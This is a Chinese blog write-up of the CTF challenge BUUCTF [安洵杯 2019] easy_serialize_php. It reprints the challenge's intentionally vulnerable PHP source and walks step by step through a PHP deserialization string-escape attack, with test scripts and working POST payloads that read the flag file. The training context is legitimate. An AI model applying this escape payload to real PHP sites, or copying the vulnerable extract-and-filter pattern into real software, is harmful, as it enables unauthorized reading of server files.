BUUCTF [安洵杯 2019]easy_serialize_php

最新推荐文章于 2024-03-11 12:36:05 发布
最新推荐文章于 2024-03-11 12:36:05 发布
阅读量2.1k 收藏
点赞数 3
分类专栏: BUUCTF 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53863234/article/details/122024542
版权

期末复习累了,做道CTF题目放松一下,做完就复习信安数学
打开后看到源码

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

代码很长但很简单,根据提示先看看phpinfo,发现
在这里插入图片描述

有可能flag就在这里面。那肯定要通过这一句来获取

file_get_contents(base64_decode($userinfo['img']));

看下img从哪里来

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

有个sha1和base64_encode,几乎不可能将img的值变成d0g3_flag.php
将目光锁定到fiter函数,这里存在字符减少的情况,可能会导致反序列化字符串逃逸

$serialize_info = filter(serialize($_SESSION));

这个$_SESSION的值我们可以通过变量覆盖来控制
测试:

<?php
error_reporting(0);
session_start();
$_SESSION["session1"]='a';
$_SESSION['session2']='b';
extract($_POST);
var_dump($_SESSION);
//$_SESSION['session3']='c';
//var_dump($_session)
?>

payload:_SESSION[abc]=123
在这里插入图片描述

在这里插入图片描述

明显前面两个session值被覆盖了,没有显示,只显示了session3。
那在这道题,$_SESSION就只有两个值,一个是我们POST的值,一个是img。
所以可以通过我们POST的值来造成反序列化逃逸而不反序列化真正的img。
如何构造呢?
base64_encode(‘d0g3_flag.php’)=ZDBnM19mbGFnLnBocA==
base64_encode(‘guest_img.png’)=Z3Vlc3RfaW1nLnBuZw==
要序列化的格式大致是这种

serialize(array('abc'=>';s:6:"7t0ken";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}','img'=>'Z3Vlc3RfaW1nLnBuZw=='));

得到:

a:2:{s:3:"abc";s:53:";s:6:"7t0ken";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

其中abc可控,要达到逃逸的目的,'abc’的字符个数应该等于";s:53:,为7
此时的";s:53:被当作数组的key值进行反序列化,value值为7t0ken
所以abc可以等于phpflag,序列化的结果应该为

a:2:{s:7:"phpflag";s:53:";s:6:"7t0ken";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

经过filter函数后,最终被反序列化的序列为:

a:2:{s:7:"";s:53:";s:6:"7t0ken";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

可以看到这一串

a:2:{s:7:"";s:53:";s:6:"7t0ken";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

恰好可以反序列化,而后面的字符被当作垃圾字符不做处理,造成反序列化逃逸。
测试:

<?php
error_reporting(0);
$a='a:2:{s:7:"";s:53:";s:6:"7t0ken";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}';
$b=unserialize($a);
echo base64_decode($b['img']);
?>

在这里插入图片描述

回显成功
payload:

?f=show_image
_SESSION[phpflag]=;s:6:"7t0ken";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

查看源码
在这里插入图片描述

base64_encode(’/d0g3_fllllllag’)=L2QwZzNfZmxsbGxsbGFn
恰好二十位

_SESSION[phpflag]=;s:6:"7t0ken";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

拿到flag
在这里插入图片描述

好了复习信安数学去了,要挂了

早川秋zcq
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
[安洵 2019]easy_serialize_php
a1262443306的博客
06-02 310
[安洵 2019]easy_serialize_php 1.打开网页就是源码 <?php $function = @$_GET['f']; function filter($img) { $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } i
[安洵 2019]easy_web详解
weixin_61995249的博客
10-03 689
靶场:https://www.nssctf.cn/problem/732。
[安洵 2019]easy_web
最新发布
人若无名,便可专心练剑
03-11 1557
但是我们发现这个url有传参,而且在url中,发现img这个位置存在一串字符串,看着像是base64编码的,我就尝试着base64解码,发现这个字符串是利用两次base64编码然后再利用一次hex编码,经过解码得到555.png,那么我们到这里就可以想着,要是可以拿到index.php的源代码,那么我们再进行代码审计,查看下有什么线索没有。我们利用burp抓包,然后再按一次先hex编码,然后再两次base64编码,然后修改img的值,然后利用img读取index.php的源代码。
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
`serialize`函数有两个主要形式:`void Serialize(CArchive& ar)`和`virtual void Serialize(__out_ecount_part(nCount, *pCount) void* lpData, UINT nCount, CArchive& ar)`。前者用于常规的成员变量串行化,后者...
se_mouz_image.rar_serialize_序列化
09-23
在这个“se_mouz_image.rar_serialize_序列化”的主题中,我们将深入探讨如何利用`serialize()`函数来序列化文档以及实现鼠标画图功能。 首先,我们来详细解释一下`serialize()`函数。`serialize()`是PHP内建的一个...
jet_serialize:用于 Javascript 的扩展序列化程序
06-11
**jet_serialize: 用于JavaScript的扩展序列化程序** 在JavaScript编程中,数据的序列化是一个常见的需求,它涉及将对象转换为字符串以便存储或传输。`jet_serialize`库提供了一个强大的解决方案,允许开发者以更...
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
grpc_serialize_example
02-14
grpc_serialize_example ex) protoc -I . proto/metric.proto --python_out=.ex) protoc -I . proto/metric.proto --go_out=.
buuctf-[安洵 2019]easy_web(小宇特详解)
小宇的web博客
02-16 3050
buuctf-[安洵 2019]easy_web(小宇特详解) 这里查看题目 这里在url里发现了img传参还有cmd 这里先从img传参入手,这里我发现img传参好像是base64的样子 进行解码,解码之后还像是base64的样子再次进行解码 3535352e706e67 这个数好像是16进制的,进行16进制转换成字符串 555.png 这里利用这个原理,先将index.php16进制编码,然后进行两次base64编码 TmprMlpUWTBOalUzT0RKbE56QTJPRGN3 base64解
[安洵 2019]easy_web1
不会编程的崽的博客
02-02 618
ctf 安洵 easy_web
安洵 2019easy-web
bwxzdjn的博客
07-19 853
涉及内容:base64解码、代码审计、MD5强类型注入、命令注入绕过 打开控制器,查看源代码,可以看到md5 is funny,可知这题应该会出现MD5 其余信息一无所获后,看到网站: 看到img=TXpVek5UTTFNbVUzTURabE5qYz0,想到base64解码 于是去Burp Suite解码 (其余大佬解出为555.png,类似一种图片形式) 得知文件名被hex->base64->base64 三重编码 于是反加密读取index.php,得到index.php base64形
[安洵 2019]easy_serialize_php 1
03-16
$serialized = serialize($data); echo $serialized; ?> ``` 最终输出的序列化字符串为: ``` O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:20;} ``` 其中,`O:4:"User":2:` 表示这是一个类名为 `User` 的...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值